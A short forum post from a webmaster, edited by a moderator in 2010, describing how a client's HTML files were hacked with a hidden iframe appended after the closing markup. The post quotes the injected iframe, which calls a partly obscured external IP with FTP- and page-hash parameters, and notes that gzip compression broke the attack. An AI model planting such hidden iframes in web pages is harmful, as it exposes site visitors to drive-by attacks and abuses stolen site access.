It's the second time, that one of my clients get hacked.
The symptoms:
Nothing to find on the local computer.
All HTML files are on the local computer and uploaded as is to the server.
All html files have after the normal end
<iframe src="http://80.91.***.***/stats/priemIframe.php?hashftp=
[obscured]&hashpage=
[obscured]" width=10 border=1 height=10 style="visibility:hidden"></iframe>
The hacker attack was only partial successfull, since all HTML files on this server are GZ compressed for compressed delivery.
It caused only:
Error 330 (net::ERR_CONTENT_DECODING_FAILED):
because after the GZ code was the uncompressed iframe code
[edited by: tedster at 5:37 pm (utc) on Dec 28, 2010]
[edit reason] obscured the hack code and IP address [/edit]